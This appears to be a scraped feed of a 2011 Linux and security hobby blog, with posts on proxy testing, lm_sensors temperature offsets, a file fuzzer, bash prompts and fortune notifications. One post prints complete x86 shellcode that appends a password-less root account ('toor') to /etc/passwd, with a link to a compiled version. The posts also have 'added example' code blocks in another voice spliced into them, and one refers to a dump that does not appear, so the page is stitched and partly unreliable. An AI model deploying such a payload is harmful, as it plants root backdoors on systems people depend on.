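Feed it the real log with `report(open("/var/log/messages").read())` (or whatever file the kernel ring buffer is logged to); only lines carrying the DENIED prefix are considered, so ordinary syslog noise passes through parse_line() as None.<br />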
It's quite funny to see the intensity of these reports in the logs: quite a few pop up every hour or so. It is a reminder that just connecting a system to the internet without securing it properly can be pretty fatal. It's a dangerous WWW out there, and web safety requires proper measures to be taken before connecting the <b>wire</b>. </div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-50724951395920052462011-02-12T22:07:00.000-08:002011-02-24T08:17:27.726-08:00python proxy tester<div dir="ltr" style="text-align: left;" trbidi="on">Getting hold of proxy lists is not a problem these days. A lot of websites provide pages upon pages of proxies, but the issue is that more than 60-70% of them don't work. Sitting and testing each one can be a pain, so to ease the issue I fired up medit and wrote the following script.<br />
<br />
The script takes input as a file with the structure:<br />
[ip]:[port]<br />
<br />
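An added example, not the pastebin script: a Python 3 parser for that input format that validates each entry and reports malformed lines instead of silently dropping them, plus a per-proxy check through urllib with a timeout. The list it reads is a constructed sample using documentation addresses, and the function names are mine.<br />

```python
import ipaddress
import urllib.error
import urllib.request

# Added example, not the post's script. Constructed input: three usable
# entries (one IPv6) followed by three malformed lines.
SAMPLE_LIST = """\
# proxies.txt, constructed sample
192.0.2.10:3128
198.51.100.23:8080
[2001:db8::1]:1080
not-an-ip:80
192.0.2.5:70000
192.0.2.6
"""


def parse_proxy_list(text):
    """Split text into (ip, port) tuples; returns (valid, rejected) so bad
    lines can be reported. The host must parse as an IPv4 or IPv6 address
    (IPv6 may be bracketed) and the port must be in 1..65535."""
    valid, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()    # allow trailing comments
        if not line:
            continue
        host, sep, port = line.rpartition(":")  # last ':' separates the port
        try:
            if not sep:
                raise ValueError("missing ':'")
            ip = ipaddress.ip_address(host.strip("[]"))
            port_no = int(port)
            if not 1 <= port_no <= 65535:
                raise ValueError("port out of range")
        except ValueError as exc:
            rejected.append((lineno, raw, str(exc)))
            continue
        valid.append((str(ip), port_no))
    return valid, rejected


def proxy_url(ip, port):
    """URL form for urllib; IPv6 literals need brackets."""
    host = f"[{ip}]" if ":" in ip else ip
    return f"http://{host}:{port}"


def check_proxy(ip, port, url="http://example.com/", timeout=5.0):
    """True if an HTTP GET through the proxy completes with a 2xx/3xx status
    within timeout seconds; any network or protocol failure counts as dead."""
    handler = urllib.request.ProxyHandler({"http": proxy_url(ip, port)})
    opener = urllib.request.build_opener(handler)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return 200 <= resp.status < 400
    except (urllib.error.URLError, OSError, ValueError):
        return False


def check_all(text, **kwargs):
    """Parse a list and test every valid entry; returns (results, rejected)."""
    valid, rejected = parse_proxy_list(text)
    return [(ip, port, check_proxy(ip, port, **kwargs)) for ip, port in valid], rejected
```

check_all() runs the checks sequentially; for a long list wrap check_proxy() in a concurrent.futures.ThreadPoolExecutor, since each dead entry costs a full timeout.<br />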
code: <a href="http://pastebin.com/w5iardS4">http://pastebin.com/w5iardS4</a> </div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-20788701347320678272011-02-12T19:03:00.000-08:002011-03-04T11:15:45.396-08:00lm_sensors and Tjunction-max<div dir="ltr" style="text-align: left;" trbidi="on">Recently, the temperature values reported by lm_sensors on my Linux laptop were becoming a point of concern. The fan and heatsink assembly had been cleaned just a few days earlier, but lm_sensors still reported my CPU at ~70C while idling! Even considering that I live in a hot part of the world, the values were too high for this time of year and for an idling CPU. Checking the logs and a bit of web research revealed the culprit:<br />
<br />
<span style="font-size: x-small;"> └─>>$] dmesg | grep Tj<br />
coretemp coretemp.0: TjMax is assumed as 100 C!<br />
coretemp coretemp.1: TjMax is assumed as 100 C!</span><br />
<br />
The <a href="http://ark.intel.com/Product.aspx?id=33915">Intel datasheet</a> for the T5750 processor gives the designed Tj-max as 85C, but the driver assumed 100C, so lm_sensors was reporting every value with a +15C offset.<br />
<br />
The bug seems to be in a recent git commit as explained in this thread: <a href="https://bbs.archlinux.org/viewtopic.php?pid=829902#p829902">https://bbs.archlinux.org/viewtopic.php?pid=829902#p829902</a><br />
Tjunction explained: <a href="http://www.techreaction.net/2009/10/14/guide-to-understanding-intel-temperatures/">http://www.techreaction.net/2009/10/14/guide-to-understanding-intel-temperatures/</a><br />
<br />
UPDATE:<br />
FIX: After discussing the issue with the devs on IRC, a small fix was suggested. Worked for me.<br />
<br />
edit '/etc/sensors3.conf' and add the lines:<br />
<span style="font-size: x-small;">chip "coretemp-*"<br />
compute temp1 @-15,@+15<br />
compute temp2 @-15,@+15</span></div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-31865089992031965522011-02-10T15:56:00.000-08:002011-02-24T07:14:04.636-08:00some old shellcode...<div dir="ltr" style="text-align: left;" trbidi="on">Going through some old files, I came across some old shellcode I had written. Nothing special, just a small payload that appends to the /etc/passwd file. To be honest it's not even that great, because to use it you need an exploit that provides uid=0, such as a kernel null pointer dereference. Anyway, here is the code:<br />
<br />
<span style="font-size: x-small;">;append_passwd.asm</span><br />
<span style="font-size: x-small;">;Payload: Adds the string [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd, thereby adding a password-less root account with login name "toor"</span><br />
<span style="font-size: x-small;">;Platform: linux/x86</span><br />
<span style="font-size: x-small;">;Size: 107 bytes</span><br />
<span style="font-size: x-small;">;Author: $andman</span><br />
<span style="font-size: x-small;">;BEGIN CODE</span><br />
<blockquote><span style="font-size: x-small;"><i>Section .data<br />
global _start<br />
_start:<br />
    jmp short callfunc          ; jmp/call trick: leaves the string's address on the stack<br />
func:<br />
    pop esi                     ; esi -> '/etc/passwd#toor...'<br />
    xor eax, eax<br />
    mov byte [esi+11], al       ; NUL over the '#' that ends "/etc/passwd"<br />
    mov byte [esi+43], al       ; NUL over the '#' that ends the passwd line<br />
    mov byte [esi+42], 0xa      ; newline in place of the space after "/bin/bash"<br />
    lea ebx, [esi+12]           ; ebx -> "toor::0:0:t00r:/root:/bin/bash\n"<br />
    mov dword [esi+44], ebx     ; stash that pointer in the XXXX scratch bytes<br />
    lea ebx, [esi]              ; ebx -> "/etc/passwd"<br />
    mov cx, 1090                ; 0x442 = O_RDWR|O_CREAT|O_APPEND<br />
    mov dx, 0x1a4               ; mode 0644<br />
    mov al, 0x05                ; sys_open<br />
    int 0x80<br />
    mov ebx, eax                ; fd<br />
    xor edx, edx<br />
    mov ecx, [esi+44]           ; buffer<br />
    mov dl, 31                  ; 30 characters plus the newline<br />
    mov al, 0x04                ; sys_write<br />
    int 0x80<br />
    mov al, 0x06                ; sys_close<br />
    int 0x80<br />
    mov al, 0x01                ; sys_exit<br />
    xor ebx, ebx<br />
    int 0x80<br />
callfunc:<br />
    call func<br />
    db '/etc/passwd#toor::0:0:t00r:/root:/bin/bash #XXXX'</i></span></blockquote><span style="font-size: x-small;">;CODE END</span><br />
<br />
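As an added example that is not part of the post: a first-pass triage script for a blob like this one. It takes the hex from the ndisasm dump earlier on this page, pairs each eax load with the following int 0x80 to list the syscalls in program order, and pulls out printable strings, so the effect of the payload (open, write, close, exit, plus the passwd line) can be read off without executing it. It is a linear byte scan, not a disassembler, and will be wrong on packed or self-modifying code; ndisasm remains the real tool. The function names are mine.<br />

```python
# Added example, not code from the post: quick triage of an x86/Linux
# shellcode blob. A linear byte scan that recognises the handful of eax-setting
# instruction encodings shellcode typically uses; it is not a disassembler.

# Hex of the payload as printed in the shellcode_2_asm dump on this page.
APPEND_PASSWD_HEX = ("eb385e31c088460b88462bc6462a0a8d5e0c895e2c8d1e66b9420466baa401"
                     "b005cd8089c331d28b4e2cb21fb004cd80b006cd80b00131dbcd80e8c3ffffff"
                     "2f6574632f70617373776423746f6f723a3a303a303a743030723a2f726f6f74"
                     "3a2f62696e2f626173682023")

# i386 syscall numbers commonly seen in shellcode (from the Linux syscall table).
SYSCALLS_I386 = {1: "exit", 2: "fork", 3: "read", 4: "write", 5: "open", 6: "close",
                 11: "execve", 15: "chmod", 23: "setuid", 63: "dup2", 90: "mmap",
                 102: "socketcall", 125: "mprotect"}


def syscall_trace(code: bytes):
    """List the syscalls invoked, in order, by tracking eax up to each int 0x80."""
    calls, eax, i = [], None, 0
    while i < len(code):
        if code[i] == 0xB0 and i + 1 < len(code):            # mov al, imm8
            eax, i = code[i + 1], i + 2
        elif code[i] == 0xB8 and i + 4 < len(code):          # mov eax, imm32
            eax, i = int.from_bytes(code[i + 1:i + 5], "little"), i + 5
        elif code[i:i + 2] == b"\x31\xc0":                   # xor eax, eax
            eax, i = 0, i + 2
        elif code[i:i + 2] == b"\xcd\x80":                   # int 0x80
            calls.append(SYSCALLS_I386.get(eax, f"syscall_{eax}"))
            i += 2
        elif code[i] == 0x40 and eax is not None:            # inc eax
            eax, i = eax + 1, i + 1
        elif code[i] == 0x48 and eax is not None:            # dec eax
            eax, i = eax - 1, i + 1
        else:
            i += 1                                           # anything else: skip a byte
    return calls


def printable_strings(code: bytes, min_len: int = 6):
    """Runs of printable ASCII at least min_len long, like strings(1)."""
    found, run = [], bytearray()
    for b in code + b"\x00":          # sentinel flushes a trailing run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                found.append(run.decode("ascii"))
            run = bytearray()
    return found


def triage(hexcode: str):
    """Size, syscall sequence and embedded strings for a hex-encoded blob."""
    code = bytes.fromhex(hexcode)
    return {"size": len(code),
            "syscalls": syscall_trace(code),
            "strings": printable_strings(code)}


if __name__ == "__main__":
    for key, value in triage(APPEND_PASSWD_HEX).items():
        print(f"{key:>9}: {value}")
```

On this payload the trace reads open, write, close, exit and the only string is the passwd entry, which matches the ;Payload comment above; the 107-byte size agrees with the ;Size line.<br />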
The compiled, alphanumeric code can be taken from exploitdb:<br />
<a href="http://www.exploit-db.com/exploits/13579/">http://www.exploit-db.com/exploits/13579/ </a></div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-37495161517774340402011-02-09T22:49:00.000-08:002011-02-24T08:45:27.582-08:00sfuzz, a mutation file format fuzzer<div dir="ltr" style="text-align: left;" trbidi="on">I thought I might as well publish some code, so here is a little something I have been working on: a simple mutation fuzzer. It just does <b>_dumb_</b> fuzzing for now, but I intend to improve it for structural correctness while fuzzing and for smarter fault injection. It is not yet complete, but it has already shown results, causing many apps to crash, mostly with invalid reads and one invalid write [dunno if exploitable? will check that out]. Also, I am thinking of writing a smart generation fuzzer for structured non-binaries. Anyway, here is the code...<br />
<br />
Source[Linux]:<br />
<a href="http://pastebin.com/kVNyKsip">http://pastebin.com/kVNyKsip</a><br />
<br />
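An added example, not the sfuzz source: the core of a dumb mutation fuzzer in Python with explicit seeding, so that the random state never depends on the wall clock (two rounds started in the same second would otherwise mutate identically) and any crashing input can be regenerated from its seed. The function names and the target runner are my own assumptions, not sfuzz's interface.<br />

```python
import random
import subprocess
import tempfile
from typing import Optional

# Added example, not code from sfuzz. Each round draws its seed from the OS
# CSPRNG and keeps it, so a crash is reproducible without storing the file.
BOUNDARY = (0x00, 0x01, 0x7F, 0x80, 0xFF)


def mutate(data: bytes, n_mutations: int = 4, seed: Optional[int] = None) -> bytes:
    """Overwrite up to n_mutations bytes of data. Same data and seed give the
    same output; seed=None draws unpredictably from random.SystemRandom."""
    if not data:
        return data
    rng = random.Random(seed) if seed is not None else random.SystemRandom()
    buf = bytearray(data)
    for _ in range(n_mutations):
        pos = rng.randrange(len(buf))
        kind = rng.randrange(3)
        if kind == 0:
            buf[pos] = rng.randrange(256)          # random byte
        elif kind == 1:
            buf[pos] ^= 1 << rng.randrange(8)      # single bit flip
        else:
            buf[pos] = rng.choice(BOUNDARY)        # boundary value
    return bytes(buf)


def fuzz_cases(sample: bytes, rounds: int, n_mutations: int = 4):
    """Yield (seed, mutated) pairs; log the seed alongside any crash."""
    sysrand = random.SystemRandom()
    for _ in range(rounds):
        seed = sysrand.getrandbits(64)
        yield seed, mutate(sample, n_mutations, seed)


def run_target(argv, payload: bytes, timeout: float = 5.0):
    """Write payload to a temp file, run argv with the path appended, and
    return the exit status. A negative status is the signal that killed the
    target (Python's convention), e.g. -11 for SIGSEGV; None means a hang."""
    with tempfile.NamedTemporaryFile(suffix=".bin") as tmp:
        tmp.write(payload)
        tmp.flush()
        try:
            proc = subprocess.run(argv + [tmp.name], capture_output=True, timeout=timeout)
        except subprocess.TimeoutExpired:
            return None
    return proc.returncode


def fuzz(argv, sample: bytes, rounds: int):
    """Return the seeds whose mutated input crashed or hung the target."""
    findings = []
    for seed, payload in fuzz_cases(sample, rounds):
        status = run_target(argv, payload)
        if status is None or status < 0:
            findings.append((seed, status))
    return findings
```

A finding is replayed with `mutate(sample, 4, seed)`; because the seed is the only state, the reproducer is a 64-bit integer rather than a saved file, and no sleep between rounds is needed.<br />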
EDIT: A small bug... the randomization depends on the current time. This means that to achieve halfway decent randomization, a sleep of at least 1s is needed. </div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-58641544223923856072011-02-09T11:34:00.001-08:002011-03-04T11:15:56.491-08:00Multiple $PS1s with urxvt and xprop<div dir="ltr" style="text-align: left;" trbidi="on">Recently, I decided to embed terminals in my desktop and wanted their prompt to differ from that of a normal terminal window. It took a while, but I finally achieved it. Embedding the terminals was easy, as explained here:<br />
<br />
<a href="https://wiki.archlinux.org/index.php/Openbox#Urxvt_in_the_background"><span style="font-weight: bold;">https://wiki.archlinux.org/index.php/Openbox#Urxvt_in_the_background</span></a><br />
<br />
and as for the different $PS1 prompts, I just modified my <span style="font-weight: bold;">.bashrc</span> with the following condition:<br />
<br />
#BEGIN CODE#<br />
<br />
<span style="font-style: italic;">winId=$(xprop -id $WINDOWID | grep "URxvtbg")</span><br />
<br />
<span style="font-style: italic;">if [ "$winId" == "" ]</span><br />
<span style="font-style: italic;">then</span><br />
<span style="font-style: italic;"> PS1="┌─\[\e[1;36m\][\u@\h]\[\e[m\].:\[\e[0;36m\][$(date +"%d/%m/%y-(%T)")]\[\e[m\]:.\[\e[1;36m\][\w]\[\e[m\]\n└─>>\[\e[1;32m\]$\[\e[m\]] "</span><br />
<span style="font-style: italic;">else</span><br />
<span style="font-style: italic;"> PS1='[\u@\h \W]\$ '</span><br />
<span style="font-style: italic;">fi</span><br />
#END CODE#<br />
<br />
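The same decision as an added example (not the post's .bashrc), written so the check can be run against captured xprop output, with a guard for a shell that has no $WINDOWID at all (a console tty or an ssh session), where xprop would only print an error. The xprop lines it checks are constructed samples and the function names are mine.<br />

```sh
#!/bin/sh
# Added example, not the post's .bashrc: the "which prompt?" decision as a
# testable function plus a guard for the no-WINDOWID case.

# prompt_for_window XPROP_OUTPUT -> "embedded" when the window was started as
# "urxvt -name URxvtbg", "normal" otherwise.
prompt_for_window() {
    case "$1" in
        *URxvtbg*) printf 'embedded\n' ;;
        *)         printf 'normal\n' ;;
    esac
}

# current_prompt -> the decision for the terminal this shell runs in. With no
# WINDOWID (tty, ssh) or no xprop binary, fall back to the normal prompt
# instead of letting xprop fail.
current_prompt() {
    if [ -z "${WINDOWID:-}" ] || ! command -v xprop >/dev/null 2>&1; then
        printf 'normal\n'
        return 0
    fi
    prompt_for_window "$(xprop -id "$WINDOWID" 2>/dev/null)"
}

# Constructed samples of what xprop prints for the two kinds of window; the
# instance name given with -name is the first WM_CLASS string.
EMBEDDED_SAMPLE='WM_CLASS(STRING) = "URxvtbg", "URxvt"'
NORMAL_SAMPLE='WM_CLASS(STRING) = "urxvt", "URxvt"'

# In .bashrc the result picks the prompt, as the post's if/else does
# (the "normal" prompt here is a simplified form of the post's).
case "$(current_prompt)" in
    embedded) PS1='[\u@\h \W]\$ ' ;;
    *)        PS1='┌─[\u@\h]:[\w]\n└─>>$] ' ;;
esac
```

Quoting "$WINDOWID" matters in the xprop call: the post's unquoted form works because X window ids are plain integers, but an empty variable would turn into a missing argument and an xprop usage error.<br />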
Basically, what this does is fetch the window information from <span style="font-weight: bold;">xprop</span> using the $WINDOWID bash variable and look for the specific <span style="font-style: italic;">name</span>* that was assigned to this terminal. If it is found, one $PS1 value is applied; if not, the other.<br />
<br />
<span style="font-style: italic;">*Refer to urxvt's man page for the switch '-name'</span>.</div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-8203764950512695422011-02-06T16:19:00.000-08:002011-03-04T11:16:41.652-08:00Fortune for you!!<div dir="ltr" style="text-align: left;" trbidi="on">Almost all Linux users are familiar with the fortune program. For new users, here is a small snippet:<br />
<br />
Name:<br />
<span style="font-style: italic;">fortune - print a random, hopefully interesting, adage</span><br />
<br />
Description from the man page:<br />
<span style="font-style: italic;">When </span><b style="font-style: italic;">fortune</b><span style="font-style: italic;"> is run with no arguments it prints out a random epigram. Epigrams are divided into several categories.</span><br />
<br />
Well, in order to fully utilize the program, I went ahead and wrote a small script that automatically displays a random fortune every time I log in. Here is the script; all it requires is the notification daemon to be installed for your particular wm.<br />
<br />
<span style="font-style: italic;">#!/bin/bash</span><br />
<span style="font-style: italic;">sleep 3</span><br />
<span style="font-style: italic;">notify-send "Hello $(whoami), Your Daily Fortune..." "$(fortune)"</span><br />
<br />
Save it as fortune.sh and mark it as executable by:<br />
<br />
<span style="font-style: italic;">chmod +x fortune.sh</span><br />
<br />
and just add it to the post-login scripts of your particular wm (openbox in my case), so '<span style="font-style: italic;">~/.config/openbox/autostart.sh</span>'.</div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0